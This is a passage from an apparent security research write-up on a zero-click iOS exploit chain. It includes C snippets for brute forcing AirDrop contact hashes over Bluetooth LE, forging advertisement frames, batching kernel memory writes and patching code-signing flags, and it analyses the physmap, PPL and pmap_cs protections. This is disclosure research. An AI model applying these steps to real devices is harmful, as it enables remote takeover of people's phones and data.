If we take a look at a couple of captured BTLE frames when we try to share a file via AirDrop, we can see there's clearly structure in there:


MacOS:

data=02010617ff4c000512000000000000000001fa5c2516bf07aba400

iOS 13:

data=02011a020a070eff4c000f05a035c928291002710c

 

             LEN    APPL T L  V

020106       17  ff 4c00 0512 000000000000000001 fa5c 2516 bf07 aba4 00

02011a020a07 0e  ff 4c00 0f05 a035c92829 1002 710c

                                

Definitely looks like more TLVs! With some reversing in sharingd we can figure out what these types are:


"Invalid" 0x0

"Hash" 0x1

"Company" 0x2

"AirPrint" 0x3

"ATVSetup" 0x4

"AirDrop" 0x5

"HomeKit" 0x6

"Prox" 0x7

"HeySiri" 0x8

"AirPlayTarget" 0x9

"AirPlaySource" 0xa

"MagicSwitch" 0xb

"Continuity" 0xc

"TetheringTarget" 0xd

"TetheringSource" 0xe

"NearbyAction" 0xf

"NearbyInfo" 0x10

"WatchSetup" 0x11


MacOS is sending AirDrop messages in the BLE advertisements. iOS is sending NearbyAction and NearbyInfo messages.

Brute forcing SHA256, or two bytes of it at least

For testing purposes we want some contacts on the device. Like the SEEMOO labs paper I generated 100 random contacts using a modified version of the AppleScript in this StackOverflow answer. Each contact has 4 contact identifiers: home and work email, home and work phone numbers.


We can also use MIRAGE to prototype brute forcing through the 16 bit space of truncated contact hashes. I wrote a MIRAGE module to broadcast Airdrop advertisements with incrementing truncated hashes. The MIRAGE micro:bit firmware doesn't support arbitrary broadcast frame injection but it is able to use the Raspberry Pi 4's built-in bluetooth controller. Running it for a while and looking at the console output from the iPhone we notice some helpful log messages showing up in Console.app:


Hashing: Error: failed to get contactsContainsShortHashes because (ratelimited)


The SEEMOO paper mentioned that they were able to brute force a truncated hash in a couple of seconds but it appears Apple have now added some rate limiting.


Spoofing different BT source MAC addresses didn't help, but slowing the brute force attempts to one every 2 seconds or so seemed to satisfy the rate limiting: in around 30 seconds, with average luck, AWDL gets enabled and MI and PSF frames start to appear on the AWDL social channels.
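
The paced brute force itself is then just a loop. A rough sketch, where awdl_active() and broadcast_airdrop_advertisement() are hypothetical wrappers (the latter would fill in the truncated-hash slots of the advertisement payload shown in the next snippet):

#include <stdint.h>
#include <unistd.h>

int  awdl_active(void);  // hypothetical: have we started seeing MI/PSF frames yet?
void broadcast_airdrop_advertisement(const uint8_t hash[2]);  // hypothetical wrapper

void brute_force_contact_hash(void) {
  for (uint32_t h = 0; h <= 0xffff && !awdl_active(); h++) {
    uint8_t hash[2] = { (uint8_t)(h >> 8), (uint8_t)h };
    broadcast_airdrop_advertisement(hash);  // candidate goes into the truncated-hash slots
    sleep(2);                               // stay under sharingd's rate limiting
  }
}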


As long as we keep broadcasting the same advertisement with the matching contact hash the AWDL interface will remain active. I didn't want to keep MIRAGE as a dependency so I ported the python prototype to use the linux native libbluetooth library and hci_send_cmd to build custom advertisement frames:


uint8_t payload[] = {0x02, 0x01, 0x06,

                     0x17,

                     0xff,

                     0x4c, 0x00, 

                     0x05, 

                     0x12, 

                     0x00, 0x00, 0x00, 0x00,

                     0x00, 0x00, 0x00, 0x00, 0x01, 

 

                     hash1[0], hash1[1],

                     hash2[0], hash2[1],

                     hash3[0], hash3[1],

                     hash4[0], hash4[1],

 

                     0x00};

 

le_set_advertising_data_cp data = {0};

data.length = sizeof(payload);

memcpy(data.data, payload, sizeof(payload));

hci_send_cmd(handle,

             OGF_LE_CTL,

             OCF_LE_SET_ADVERTISING_DATA,

             sizeof(payload)+1,

             &data);

Popping calc with zero clicks

Combining the AWDL exploit and BLE brute-force, we get a new demo:


With the phone left idle on the home screen and no user interaction we force the AWDL interface to activate using BLE advertisements. The AWDL exploit gains kernel memory read write in a few seconds after starting and the entire end to end exploit takes around a minute.


There may well be better, faster ways to force-enable AWDL but for my demo this will do.

Let's run an implant!

This demo is neat but it really doesn't convey the severity of what has happened: we can read and write kernel memory remotely, with no user interaction, which is enough to compromise almost all of the user's data. I know that Apple has invested significant effort in "post-exploitation" hardening, so I wanted to demonstrate that with just this single vulnerability those mitigations could be defeated to the point where I could run something like a real-world implant of the kind we've seen deployed against end users before. Trying to defend against an attacker with arbitrary memory read/write is a losing game, but there's a difference between saying that, and actually proving it.

Speedy writer

We're going to need to write much more arbitrary data for this final step, so we need the arbitrary write to be even faster. There's one more optimization left.


Due to the order in which loads and stores occur in actionFrameReport we were able to build a primitive which gave us a timestamp valid for up to 1024ms and a large n_frames_in_last_second value. We used that to do one arbitrary add, then restarted the whole setup: replaced upper_peer's timestamp with 0, sent another frame to get a fresh timestamp and so on.


But why can't we just keep using the first timestamp and bundle more writes together? We can; we just have to take great care not to exceed that 1024ms window. The exploit takes a very conservative approach here and uses only a few extra milliseconds. The reason is that we're running as a regular userspace program on a small system; we don't have anything like real-time scheduling guarantees. Linux kind-of supports running userspace programs on isolated cores to give something like a real-time experience, but for getting this demo exploit running it was sufficient to boost the priority of the exploit process with nice and leave a large safety window within the 1024ms. The code tries to bundle large buffer writes in chunks of 16, which provides a reasonable speed up.
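
A sketch of what that batching might look like, where refresh_write_window() stands in for the zero-the-timestamp-then-spoof-a-frame dance described earlier and the chunk size of 16 is the one mentioned above:

#include <stdint.h>

void wk8(uint64_t kaddr, uint8_t desired_byte);  // single-byte write from earlier
void refresh_write_window(void);                 // hypothetical: reset upper_peer's timestamp, spoof a frame

void wkbuf_batched(uint64_t kaddr, uint8_t* buf, uint32_t len) {
  for (uint32_t off = 0; off < len; off += 16) {
    refresh_write_window();                      // fresh 1024ms window
    uint32_t chunk = (len - off) < 16 ? (len - off) : 16;
    for (uint32_t i = 0; i < chunk; i++) {
      wk8(kaddr + off + i, buf[off + i]);        // all of these must land inside the window
    }
  }
}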

Physmapping

Way back when I released the first demo exploit which disclosed random chunks of physical memory I had taken a look at how the physmap works on iOS.


Linux, Windows and XNU all have physmaps; they are a very convenient way of manipulating physical memory when your code has paging enabled and can't directly manipulate physical memory any more.


Abstractly, physmaps are virtual mappings of all of physical memory


The physmap is (typically) a 1:1 virtual mapping of physical memory. You can see in the diagram how the physical memory at the bottom might be split up into different regions, with some of those regions currently mapped in the kernel virtual address space. Some other physical memory regions might for example be used for userspace processes.


The physmap is the large kernel virtual memory region shown towards the right of the virtual address space, which is the same size as the amount of physical memory. The pagetables which translate virtual memory accesses in this region are set up in such a way that any access at an offset into the physmap virtual region gets translated to that same offset from the base of physical memory.


The physmap in XNU isn't set up exactly like that. Instead they use a "segmented physical aperture". In practice this means that they set up a number of smaller "sub-physmaps" inside the physmap region and populate a table called the PTOV table to allow translation from a physical address to a virtual address inside the physmap region:


pa: 0x000000080e978000 kva: 0xfffffff070928000 len: 0xde03c000 (3.7GB)

pa: 0x0000000808e14000 kva: 0xfffffff06ade4000 len: 0x05b44000 (95MB)

pa: 0x0000000801b80000 kva: 0xfffffff066000000 len: 0x04cb8000 (80MB)

pa: 0x0000000808d04000 kva: 0xfffffff06acf4000 len: 0x000f0000 (1MB)

pa: 0x0000000808df4000 kva: 0xfffffff06acd4000 len: 0x00020000 (130kb)

pa: 0x0000000808cec000 kva: 0xfffffff06acbc000 len: 0x00018000 (100kb)

pa: 0x0000000808a80000 kva: 0xfffffff06acb8000 len: 0x00004000 (16kb)

pa: 0x0000000808df4000 kva: 0xfffffff06acf4000 len: 0x00000000 (0kb)


There's one more important physical region not captured in the PTOV table which is the kernelcache image itself; this is found starting at gVirtBase and the kernel functions for translating between physical and physmap-virtual addresses take this into account.
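
As an illustration of what such a lookup involves, here's a sketch of a PTOV-style translation. The struct layout is my own and XNU's real phystokv routines differ in detail, but the idea is the same:

#include <stdint.h>
#include <stddef.h>

struct ptov_entry {
  uint64_t pa;    // physical base
  uint64_t kva;   // kernel virtual base inside the physmap
  uint64_t len;   // length of the region
};

// Translate a physical address to its physmap virtual address using a
// PTOV-style table like the one dumped above.
uint64_t phys_to_physmap(const struct ptov_entry* table, size_t n, uint64_t pa) {
  for (size_t i = 0; i < n; i++) {
    if (pa >= table[i].pa && pa - table[i].pa < table[i].len) {
      return table[i].kva + (pa - table[i].pa);
    }
  }
  return 0;  // not covered here; e.g. the kernelcache itself is handled via gVirtBase
}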


The interesting thing is that the virtual protection of the pages in the physmap doesn't have to match the virtual protection of the pages as seen by a page table traversal from the perspective of a task. I wrote some test code using oob_timestamp to overwrite a portion of its own __TEXT segment via the physmap and it worked, allowing me to execute new native instructions. Could we execute userspace shellcode remotely just by writing directly into the physmap?

What happened to my physmap?

This works fine when prototyped with oob_timestamp modifying itself, but if you try to use it to target a system process, it panics. Something else is going on.

APRR, PPL and pmap_cs

The canonical resource for APRR is s1guza's blog post. It's a hardware customization by Apple to add an extra layer of indirection to page protection lookups via a control register. The page-tables alone are no longer enough to determine the runtime memory protection of a page.


APRR is used in the Safari JIT hardening and in the kernel it's used to implement PPL (Page Protection Layer). For an in-depth look at PPL check out Brandon Azad's recent blog post.


PPL uses APRR to dynamically switch the page protections of two kernel regions, a text region containing code and a data region. Normally the PPL text region is not executable and the PPL data region is not writable. Important data structures have been moved into this PPL data region, including page tables and pmaps (the abstraction layer above page tables). All the code which modifies objects inside PPL data has been moved inside the PPL text segment.


But if the PPL text is non-executable, how can you run the code to modify the PPL data regions? And how can you make them writable?


The only way to execute the code inside the PPL text region is to go through a trampoline function which flips the APRR register bits to make the PPL text region executable and the PPL data region writable before jumping to the provided ppl_routine. Obviously great care has to be taken to ensure only code inside PPL text runs in this state.
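Ignoring the real assembly-level detail, the shape of that trampoline can be pictured roughly as follows. This is pure illustration: every name and constant here is invented, and the actual implementation is hand-written assembly operating on the APRR control register with interrupts and preemption carefully managed.

#include <stdint.h>

/* Conceptual sketch only; the names, constants and bit manipulation below
   are invented for illustration and do not reflect the real APRR encoding. */
#define APRR_PPL_TEXT_EXEC  (1ULL << 0) /* placeholder bit, not a real value */
#define APRR_PPL_DATA_WRITE (1ULL << 1) /* placeholder bit, not a real value */

extern uint64_t read_aprr(void);
extern void write_aprr(uint64_t value);
extern uint64_t (*ppl_handler_table[])(void *);

uint64_t ppl_enter(unsigned int ppl_routine, void *args) {
  uint64_t saved = read_aprr();
  /* Flip protections: PPL text becomes executable, PPL data writable. */
  write_aprr(saved | APRR_PPL_TEXT_EXEC | APRR_PPL_DATA_WRITE);
  uint64_t ret = ppl_handler_table[ppl_routine](args);
  /* Restore the normal view on the way out. */
  write_aprr(saved);
  return ret;
}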


Brandon likened this to a "kernel inside the kernel" which is a good way to look at it. Modifications to page tables and pmaps are now meant to only happen by the kernel making "PPL syscalls" to request the modifications, with the implementation of those PPL syscalls being inside the PPL text region. Check out Brandon's blog post for discussion of how to exploit a vulnerability in the PPL code to make those changes anyway!


It turns out that it's not just page tables and pmaps which PPL protects. Reversing more of the PPL routines, there's a group of them, starting around routine 38, which implements a new model of codesigning enforcement called pmap_cs.


Indeed, the pmap_cs string appears in the released XNU source, though attempts have been made to strip as much of the PPL-related code as possible from the open source release. The vm_map_entry structure has this new field:


  /* boolean_t */ pmap_cs_associated:1, /* pmap_cs will validate */


From this code snippet from vm_fault.c it's pretty clear that pmap_cs is a new way to verify code signatures:


#if PMAP_CS
  if (fault_info->pmap_cs_associated &&
      pmap_cs_enforced(pmap) &&
      !m->vmp_cs_validated &&
      !m->vmp_cs_tainted &&
      !m->vmp_cs_nx &&
      (prot & VM_PROT_EXECUTE) &&
      (caller_prot & VM_PROT_EXECUTE)) {
    /*
     * With pmap_cs, the pmap layer will validate the
     * code signature for any executable pmap mapping.
     * No need for us to validate this page too:
     * in pmap_cs we trust...
     */
    vm_cs_defer_to_pmap_cs++;
  } else {
    vm_cs_defer_to_pmap_cs_not++;
    vm_page_validate_cs(m);
  }
#else /* PMAP_CS */
  vm_page_validate_cs(m);
#endif /* PMAP_CS */


vm_page_validate_cs is the old code-signing enforcement path, which can easily be tricked into allowing shellcode by changing the codesigning enforcement flags in the task's proc structure. The question is: what determines whether the new pmap_cs model or the old approach is used?
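For reference, the trick against that old path is typically described as patching the csflags field of the target's proc structure once you have a kernel read/write primitive. A rough sketch, where kread32/kwrite32 and the proc/csflags offsets are hypothetical helpers, and the flag values should be double-checked against cs_blobs.h for the target build:

#include <stdint.h>

/* Illustrative only: assumes an existing kernel read/write primitive
   (kread32/kwrite32 are hypothetical) and a known proc address plus
   csflags offset. Flag values follow XNU's cs_blobs.h; verify them
   against the target build before relying on them. */
#define CS_HARD            0x00000100 /* don't load invalid pages */
#define CS_KILL            0x00000200 /* kill process if it becomes invalid */
#define CS_PLATFORM_BINARY 0x04000000 /* this is a platform binary */
#define CS_DEBUGGED        0x10000000 /* process is/was debugged, may run invalid pages */

extern uint32_t kread32(uint64_t kaddr);
extern void kwrite32(uint64_t kaddr, uint32_t value);

static void relax_codesigning(uint64_t proc, uint64_t csflags_offset) {
  uint32_t csflags = kread32(proc + csflags_offset);
  csflags |= CS_DEBUGGED | CS_PLATFORM_BINARY;
  csflags &= ~(uint32_t)(CS_HARD | CS_KILL);
  kwrite32(proc + csflags_offset, csflags);
}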